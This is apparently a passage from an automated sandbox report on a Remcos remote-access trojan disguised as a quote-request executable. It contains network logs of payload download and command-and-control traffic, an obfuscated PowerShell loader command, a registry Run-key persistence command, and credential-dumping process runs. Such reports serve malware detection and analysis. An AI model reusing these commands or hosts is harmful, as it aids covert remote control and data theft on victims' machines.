                                                    Oct 17, 2024 14:33:09.294465065 CEST460958048185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:33:09.294473886 CEST460958048185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:33:09.294483900 CEST460958048185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:33:09.294492960 CEST460958048185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:33:09.294506073 CEST460958048185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:33:09.389784098 CEST580484609192.168.2.8185.150.191.117
                                                    Oct 17, 2024 14:33:09.395271063 CEST460958048185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:33:09.395354033 CEST580484609192.168.2.8185.150.191.117
                                                    Oct 17, 2024 14:33:14.519011974 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:33:14.520946980 CEST580474609192.168.2.8185.150.191.117
                                                    Oct 17, 2024 14:33:14.525813103 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:33:44.424812078 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:33:44.426446915 CEST580474609192.168.2.8185.150.191.117
                                                    Oct 17, 2024 14:33:44.431504011 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:34:14.432699919 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:34:14.437144041 CEST580474609192.168.2.8185.150.191.117
                                                    Oct 17, 2024 14:34:14.441941977 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:34:44.536695004 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:34:44.538903952 CEST580474609192.168.2.8185.150.191.117
                                                    Oct 17, 2024 14:34:44.543807030 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:34:44.913331985 CEST5804980192.168.2.8178.237.33.50
                                                    Oct 17, 2024 14:34:44.913456917 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:34:45.225653887 CEST5804980192.168.2.8178.237.33.50
                                                    Oct 17, 2024 14:34:45.225653887 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:34:45.835000992 CEST5804980192.168.2.8178.237.33.50
                                                    Oct 17, 2024 14:34:45.835000992 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:34:47.038165092 CEST5804980192.168.2.8178.237.33.50
                                                    Oct 17, 2024 14:34:47.039124012 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:34:49.444365025 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:34:49.444482088 CEST5804980192.168.2.8178.237.33.50
                                                    Oct 17, 2024 14:34:54.256922007 CEST5804980192.168.2.8178.237.33.50
                                                    Oct 17, 2024 14:34:54.256922007 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:35:03.866364956 CEST5804980192.168.2.8178.237.33.50
                                                    Oct 17, 2024 14:35:03.866364956 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:35:14.449654102 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:35:14.453449011 CEST580474609192.168.2.8185.150.191.117
                                                    Oct 17, 2024 14:35:14.458295107 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:35:44.449964046 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:35:44.453418016 CEST580474609192.168.2.8185.150.191.117
                                                    Oct 17, 2024 14:35:44.458327055 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:36:14.455781937 CEST460958047185.150.191.117192.168.2.8
                                                    Oct 17, 2024 14:36:14.456969976 CEST580474609192.168.2.8185.150.191.117
                                                    Oct 17, 2024 14:36:14.462126017 CEST460958047185.150.191.117192.168.2.8
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 17, 2024 14:32:45.920612097 CEST5365262162.159.36.2192.168.2.8
                                                    Oct 17, 2024 14:32:47.106822014 CEST6387953192.168.2.81.1.1.1
                                                    Oct 17, 2024 14:32:47.130625963 CEST53638791.1.1.1192.168.2.8
                                                    Oct 17, 2024 14:33:02.910087109 CEST5496453192.168.2.81.1.1.1
                                                    Oct 17, 2024 14:33:02.919342995 CEST53549641.1.1.1192.168.2.8
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 17, 2024 14:32:47.106822014 CEST192.168.2.81.1.1.10x8deaStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                    Oct 17, 2024 14:33:02.910087109 CEST192.168.2.81.1.1.10xe921Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 17, 2024 14:32:47.130625963 CEST1.1.1.1192.168.2.80x8deaName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                    Oct 17, 2024 14:33:02.919342995 CEST1.1.1.1192.168.2.80xe921No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                    • 103.72.57.120
                                                    • geoplugin.net
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.858046103.72.57.120805744C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 17, 2024 14:32:55.105808973 CEST187OUTGET /diddyishere/YyHolEVWoHsYmSFIbeB57.bin HTTP/1.1
                                                    User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: 103.72.57.120
                                                    Cache-Control: no-cache
                                                    Oct 17, 2024 14:32:56.119632006 CEST1236INHTTP/1.1 200 OK
                                                    Date: Thu, 17 Oct 2024 12:32:55 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                    Last-Modified: Thu, 17 Oct 2024 10:30:38 GMT
                                                    ETag: "78c40-624a9ad72c788"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 494656
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 5a 8f fc b9 c2 f9 f2 19 c5 61 dc ac 71 ea a4 7f 7e d7 dc f1 20 bb 34 6c 5e d2 15 15 2c 24 5e c3 95 61 20 f1 7f 4b 69 07 04 0d cf d8 6f 02 d4 dc 91 33 aa 23 6e 63 cd 8c db 53 f3 58 75 1e f9 14 95 7d 93 7b 0d 40 60 ef 20 81 f8 c7 94 40 15 bd 1f 90 76 0e 0a 98 f8 6c 86 9d ab 56 7d a5 24 f8 46 89 71 cb cc 90 7d e1 55 20 f8 b9 2f 7c dd 80 93 fd a1 cb 32 34 e8 49 87 17 4b 9a 07 0f 58 ce 4e a6 31 aa c8 30 ba 85 b4 2c 5a 0d 36 f1 fc e5 cd 47 46 5d ea 90 72 a6 77 b5 e4 40 aa fe 2f e0 7e a1 2f ae ab cf d2 21 e4 92 36 7e fa 65 14 8c b2 f6 c1 50 92 e4 72 bc 7c 20 d5 ac 6e 26 7f b0 f7 38 2d 73 9e 9b 7c 5b 76 ee ae 6a 45 65 85 cc a3 e8 53 2e 5f fc f9 35 4b 81 fe 7a 0f 0d 2c 18 c2 69 77 07 62 08 67 65 27 ba a9 64 91 36 53 00 d4 75 62 b8 ea 61 09 52 3a 46 fd a5 94 7a 1a 04 ae f0 1f 16 68 67 32 54 7d 1d 39 08 5c 4d af 34 59 bd 51 47 a4 da 36 6f b2 90 13 40 01 97 97 2a e3 ee aa 65 c7 b6 cf 81 7b 5c 28 cc 28 b9 e0 b9 44 21 98 51 26 46 d3 3f 44 20 72 28 76 ed 68 05 83 8c f3 35 c2 d3 3f 3d b8 d4 18 ac b5 6a e1 e9 8a aa [TRUNCATED]
                                                    Data Ascii: Zaq~ 4l^,$^a Kio3#ncSXu}{@` @vlV}$Fq}U /|24IKXN10,Z6GF]rw@/~/!6~ePr| n&8-s|[vjEeS._5Kz,iwbge'd6SubaR:Fzhg2T}9\M4YQG6o@*e{\((D!Q&F?D r(vh5?=j_-ChO'u&NQe7&ayzcW@49Iw)&w9Kwfr3*g*Ij9AakY!8_|}eN/[/B\EN1&B{v4D<5EU<{jv8}djCWJq-fb972<`$_xy$83KIX*+[YII4xT_/\W+HgAf [s*&b5g-'u(~yr+Zl/Lo1j`m(=T5^4ZX`AQJgM2Pd!CSk{=TFg;&Ab>n[W)\Sh_YW3D;XIYBDir.Wc^v#] [PAy~WsX^Cq6Oyla+)YzI{Q,n*r\u<LAv|\S_f%VZ^8hV
                                                    Oct 17, 2024 14:32:56.119668961 CEST1236INData Raw: 22 4b 6c 6b a0 70 7e b1 22 23 d8 4c 99 29 c6 29 83 31 c2 30 32 ad 44 14 73 f5 99 f4 62 bd 09 c0 c9 a0 a6 2e 76 0c 4a f3 a2 67 a9 c9 f8 2a c9 ef 29 61 47 73 dd 11 3e b2 e4 93 30 90 77 46 9c 0a c5 46 6d fd 71 0a bb c6 e0 78 ee 75 3a 0d 57 72 9e 3c
                                                    Data Ascii: "Klkp~"#L))102Dsb.vJg*)aGs>0wFFmqxu:Wr<r/65eQg[U2FfAq_k{!?sW0p{b}|/{,Oi /s`LcwdIW_L^P/7<(7Gu ,
                                                    Oct 17, 2024 14:32:56.119680882 CEST1236INData Raw: 4f 74 4b a1 c0 cb 88 c8 6c ce 5e 96 bc b3 c1 7a bf 66 68 29 c1 94 e8 18 81 85 40 ad 5c 53 6b b0 8d 81 48 8f 07 ef 1d 41 3f e3 3e 33 a2 34 e4 a2 f1 f6 42 e0 7e c3 3c 70 bb 0a b6 1e 24 29 4f b6 42 04 3d 11 dc 8d d9 0f 9e 28 ef 8a 11 dd 89 b0 2b e4
                                                    Data Ascii: OtKl^zfh)@\SkHA?>34B~<p$)OB=(+\-hD"mxH3l*iQ#kh&~;<qN }PkCJ=E>BS.k]X^d\jn>,?Y&XZ;=0{wrK0=ZF/^T
                                                    Oct 17, 2024 14:32:56.119842052 CEST1236INData Raw: 38 53 3f d3 4a a4 50 04 e6 c7 35 b0 07 db 54 b6 ad 62 2b 79 ef de f5 10 aa b1 1b 66 30 1e 0f d8 2c dc f5 d2 42 ff e2 3c 7b df 2c 37 44 3d da c6 39 47 aa c6 38 e8 e9 1a 7d e4 c2 3e 4c eb 77 6f dc a9 c7 54 fb 70 d1 de d5 e0 11 a3 01 14 b3 3b a8 09
                                                    Data Ascii: 8S?JP5Tb+yf0,B<{,7D=9G8}>LwoTp;u'r<-Z65bKHIr5O}PB{+ChfS@5ny(QD'|\z*/I8])Xa]Og09k\%[g_hn"j2?r.
                                                    Oct 17, 2024 14:32:56.119856119 CEST848INData Raw: 71 33 6c c0 d4 44 73 bb 55 fd 18 30 bb a7 68 72 f6 c1 bc 96 17 e3 af d3 54 81 44 79 3a 97 ae d9 e5 68 c0 00 cd 07 52 84 e6 bb c1 9d 3a d5 75 cd e3 ea 9b 5c dc 48 ce 0c 82 83 90 0d 1f 99 0c 89 31 6f 8d f4 d7 05 1a 44 03 26 42 7d 9b df 4b bb 9f be
                                                    Data Ascii: q3lDsU0hrTDy:hR:u\H1oD&B}KT&=;c~V'?ctm.N=}_A}lm!y[0VcB"ETgK+|][xxh5%iq4Jq. Zf'ap|U^?_"^Fsm#V
                                                    Oct 17, 2024 14:32:56.440072060 CEST1236INData Raw: 7d 38 22 6f af ba ef ee 78 d9 97 4b 21 6d c0 e5 35 8b 0f 68 60 e8 d5 c5 61 2d 32 a5 43 d3 77 3b f9 60 75 64 a9 62 5e 15 45 97 ec ff b2 eb c4 bd b8 bc 61 51 09 68 06 2f d2 56 6b 70 f6 32 65 25 0d 37 aa 6d df fe 76 c2 b3 15 e1 18 76 e3 6f 05 6b c7
                                                    Data Ascii: }8"oxK!m5h`a-2Cw;`udb^EaQh/Vkp2e%7mvvok[P]0Ydv?$o3H)Ym`"aS%fs[&hg<JqGXPX/PPPf].U2`lI0L{u("
                                                    Oct 17, 2024 14:32:56.440087080 CEST1236INData Raw: 08 55 23 ce c4 28 f0 bb db 81 e0 b3 5a 57 36 05 12 9d 87 f9 ed 3c f7 be ff 43 f8 d9 be 8e f7 2b 6a 50 29 e3 53 4a 69 a5 cd 96 21 91 7d ab 99 10 b0 88 33 98 a5 8b 40 bc 0c c3 67 72 ec df da 62 ed 46 79 07 65 64 d2 6a 13 0e 79 5d bd a2 13 1e de 91
                                                    Data Ascii: U#(ZW6<C+jP)SJi!}3@grbFyedjy]0y]9Ht(8)r]bMm7Zu2z:d2gqeh@l?JIvON`yPyBJ0Aw~Ux98nf4.#9Ygj
                                                    Oct 17, 2024 14:32:56.440098047 CEST1236INData Raw: d8 57 29 90 33 89 3f 9a 0c dc 52 ff ff 73 d5 4b a4 e8 97 4f b6 e3 0e ad 12 43 44 6a d8 4f 39 fd 84 73 06 99 ca 03 cc 11 a2 08 31 6d bb 59 83 2d 0a 6e 90 76 58 97 58 ae 1c 9a 02 2a b5 12 f7 7c 3f b6 3b 7b 2e 01 cb d2 6b c2 39 81 69 6a a6 5b c9 b0
                                                    Data Ascii: W)3?RsKOCDjO9s1mY-nvXX*|?;{.k9ij[xdx&:{$-Sk4$^]hlh=]=)\J+z{@xB,s1p"f743"/|{H4,E!JFt)hZ|6/e0f-24
                                                    Oct 17, 2024 14:32:56.440110922 CEST1236INData Raw: 1f 66 21 d7 8b e1 31 64 80 c2 2e 12 4d e0 b7 11 25 9d 9d d5 3d 31 4d 4a f1 be d0 20 a6 76 ac a8 22 04 d6 0e c4 76 43 00 92 f2 f4 aa 88 c5 28 5a 88 65 e6 f4 ed f3 f9 86 31 f4 29 59 76 7c c0 4e fd 11 0b 9b 95 dd 2d 65 9a 8c 71 a7 5c 3f bf 8a 42 67
                                                    Data Ascii: f!1d.M%=1MJ v"vC(Ze1)Yv|N-eq\?BglX)[z/iNc}%!2LXfO|T@>~^*|#X$,=2vt&9d+SI`r(*zB!.y{F6t$\p;tmXB@,V-}G6(
                                                    Oct 17, 2024 14:32:56.440130949 CEST1236INData Raw: d2 1c 17 87 8a 0d c9 3f f2 a6 0e d2 b9 b6 03 34 9d 0f 84 87 f1 b6 d8 57 f0 0d f1 2c 6e 56 a7 5b ba 97 d7 14 1a 23 a8 69 f8 a0 52 01 b8 0b a2 07 45 fd 5a fe df 50 59 d6 4a 00 d2 86 3d b2 3c 48 34 10 55 e3 85 64 79 d5 cf 2e cd af 2c e4 f4 51 b7 00
                                                    Data Ascii: ?4W,nV[#iREZPYJ=<H4Udy.,QPkN|}*;]z[yDYl%I`^@,n*p6V61p)>.F2l |'Ns"Q`<ZWSq*|vKQ~WyfY(`LY&u]Bsf"
                                                    Oct 17, 2024 14:32:56.440804005 CEST1236INData Raw: 83 3d 24 c1 f0 16 4a c9 83 79 f5 2f 8c 5d 93 d7 b8 9f c6 7c b4 28 5c ff 52 2f 97 59 35 9a 1d fa 01 06 1c 17 0e 65 0e 26 1d 3f 15 44 25 41 e0 83 f2 a9 72 1e 8c ee 34 7f 08 b5 f5 b0 83 63 dc 8a de 23 75 92 1e 7c ec 8b 62 6c 80 f3 ac 04 ce 8e 08 20
                                                    Data Ascii: =$Jy/]|(\R/Y5e&?D%Ar4c#u|bl DN=3$PhGV lZIz GR|9;J*H'ln1n7ydV7r^[%;]i5!Im|CETCS]zg(x4:


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.858049178.237.33.50805744C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 17, 2024 14:33:02.926587105 CEST71OUTGET /json.gp HTTP/1.1
                                                    Host: geoplugin.net
                                                    Cache-Control: no-cache
                                                    Oct 17, 2024 14:33:03.779995918 CEST1165INHTTP/1.1 200 OK
                                                    date: Thu, 17 Oct 2024 12:33:03 GMT
                                                    server: Apache
                                                    content-length: 957
                                                    content-type: application/json; charset=utf-8
                                                    cache-control: public, max-age=300
                                                    access-control-allow-origin: *
                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                    Data Ascii: { "geoplugin_request":"173.254.250.82", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:08:32:13
                                                    Start date:17/10/2024
                                                    Path:C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe"
                                                    Imagebase:0x400000
                                                    File size:1'244'223 bytes
                                                    MD5 hash:71A5C22358684EA0359D9E20C12CBFD0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:08:32:13
                                                    Start date:17/10/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$Stomapod=$Ketonizes.SubString(11239,3);.$Stomapod($Ketonizes)"
                                                    Imagebase:0x40000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:08:32:14
                                                    Start date:17/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:08:32:41
                                                    Start date:17/10/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe"
                                                    Imagebase:0x400000
                                                    File size:1'244'223 bytes
                                                    MD5 hash:71A5C22358684EA0359D9E20C12CBFD0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3960470900.000000000287A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 5%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:08:32:53
                                                    Start date:17/10/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)"
                                                    Imagebase:0xa40000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:08:32:53
                                                    Start date:17/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:08:32:53
                                                    Start date:17/10/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)"
                                                    Imagebase:0x5c0000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:08:33:06
                                                    Start date:17/10/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\lmkhnkgtxjjxcrnotizi"
                                                    Imagebase:0x400000
                                                    File size:1'244'223 bytes
                                                    MD5 hash:71A5C22358684EA0359D9E20C12CBFD0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:08:33:06
                                                    Start date:17/10/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\ngpzfdrvkrbkmxjsctukugj"
                                                    Imagebase:0x400000
                                                    File size:1'244'223 bytes
                                                    MD5 hash:71A5C22358684EA0359D9E20C12CBFD0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:08:33:06
                                                    Start date:17/10/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\xivkgncoyztpolxwtdgdfsekyz"
                                                    Imagebase:0x7ff7194a0000
                                                    File size:1'244'223 bytes
                                                    MD5 hash:71A5C22358684EA0359D9E20C12CBFD0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:19%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:21.3%
                                                      Total number of Nodes:1318
                                                      Total number of Limit Nodes:30
                                                      execution_graph 3892 402840 3893 402bbf 18 API calls 3892->3893 3895 40284e 3893->3895 3894 402864 3897 405bca 2 API calls 3894->3897 3895->3894 3896 402bbf 18 API calls 3895->3896 3896->3894 3898 40286a 3897->3898 3920 405bef GetFileAttributesW CreateFileW 3898->3920 3900 402877 3901 402883 GlobalAlloc 3900->3901 3902 40291a 3900->3902 3905 402911 CloseHandle 3901->3905 3906 40289c 3901->3906 3903 402922 DeleteFileW 3902->3903 3904 402935 3902->3904 3903->3904 3905->3902 3921 403222 SetFilePointer 3906->3921 3908 4028a2 3909 40320c ReadFile 3908->3909 3910 4028ab GlobalAlloc 3909->3910 3911 4028bb 3910->3911 3912 4028ef 3910->3912 3913 403027 36 API calls 3911->3913 3914 405ca1 WriteFile 3912->3914 3915 4028c8 3913->3915 3916 4028fb GlobalFree 3914->3916 3918 4028e6 GlobalFree 3915->3918 3917 403027 36 API calls 3916->3917 3919 40290e 3917->3919 3918->3912 3919->3905 3920->3900 3921->3908 3922 401cc0 3923 402ba2 18 API calls 3922->3923 3924 401cc7 3923->3924 3925 402ba2 18 API calls 3924->3925 3926 401ccf GetDlgItem 3925->3926 3927 402531 3926->3927 3928 4029c0 3929 402ba2 18 API calls 3928->3929 3930 4029c6 3929->3930 3931 4029f9 3930->3931 3932 40281e 3930->3932 3934 4029d4 3930->3934 3931->3932 3933 40603c 18 API calls 3931->3933 3933->3932 3934->3932 3936 405f61 wsprintfW 3934->3936 3936->3932 3937 401fc3 3938 401fd5 3937->3938 3948 402087 3937->3948 3939 402bbf 18 API calls 3938->3939 3941 401fdc 3939->3941 3940 401423 25 API calls 3944 4021e1 3940->3944 3942 402bbf 18 API calls 3941->3942 3943 401fe5 3942->3943 3945 401ffb LoadLibraryExW 3943->3945 3946 401fed GetModuleHandleW 3943->3946 3947 40200c 3945->3947 3945->3948 3946->3945 3946->3947 3957 406463 WideCharToMultiByte 3947->3957 3948->3940 3951 402056 3953 405179 25 API calls 3951->3953 3952 40201d 3954 401423 25 API calls 3952->3954 3955 40202d 3952->3955 3953->3955 3954->3955 3955->3944 3956 402079 FreeLibrary 3955->3956 3956->3944 3958 40648d GetProcAddress 3957->3958 3959 402017 3957->3959 3958->3959 3959->3951 3959->3952 3960 4016c4 3961 402bbf 18 API calls 3960->3961 3962 4016ca GetFullPathNameW 3961->3962 3965 4016e4 3962->3965 3969 401706 3962->3969 3963 40171b GetShortPathNameW 3964 402a4c 3963->3964 3966 40635d 2 API calls 3965->3966 3965->3969 3967 4016f6 3966->3967 3967->3969 3970 40601a lstrcpynW 3967->3970 3969->3963 3969->3964 3970->3969 3981 40194e 3982 402bbf 18 API calls 3981->3982 3983 401955 lstrlenW 3982->3983 3984 402531 3983->3984 3985 4027ce 3986 4027d6 3985->3986 3987 4027da FindNextFileW 3986->3987 3989 4027ec 3986->3989 3988 402833 3987->3988 3987->3989 3991 40601a lstrcpynW 3988->3991 3991->3989 3992 4048cf 3993 4048fb 3992->3993 3994 4048df 3992->3994 3996 404901 SHGetPathFromIDListW 3993->3996 3997 40492e 3993->3997 4003 405743 GetDlgItemTextW 3994->4003 3998 404911 3996->3998 3999 404918 SendMessageW 3996->3999 4001 40140b 2 API calls 3998->4001 3999->3997 4000 4048ec SendMessageW 4000->3993 4001->3999 4003->4000 4004 401754 4005 402bbf 18 API calls 4004->4005 4006 40175b 4005->4006 4007 405c1e 2 API calls 4006->4007 4008 401762 4007->4008 4008->4008 4016 401d56 GetDC GetDeviceCaps 4017 402ba2 18 API calls 4016->4017 4018 401d74 MulDiv ReleaseDC 4017->4018 4019 402ba2 18 API calls 4018->4019 4020 401d93 4019->4020 4021 40603c 18 API calls 4020->4021 4022 401dcc CreateFontIndirectW 4021->4022 4023 402531 4022->4023 4024 401a57 4025 402ba2 18 API calls 4024->4025 4026 401a5d 4025->4026 4027 402ba2 18 API calls 4026->4027 4028 401a05 4027->4028 4029 4014d7 4030 402ba2 18 API calls 4029->4030 4031 4014dd Sleep 4030->4031 4033 402a4c 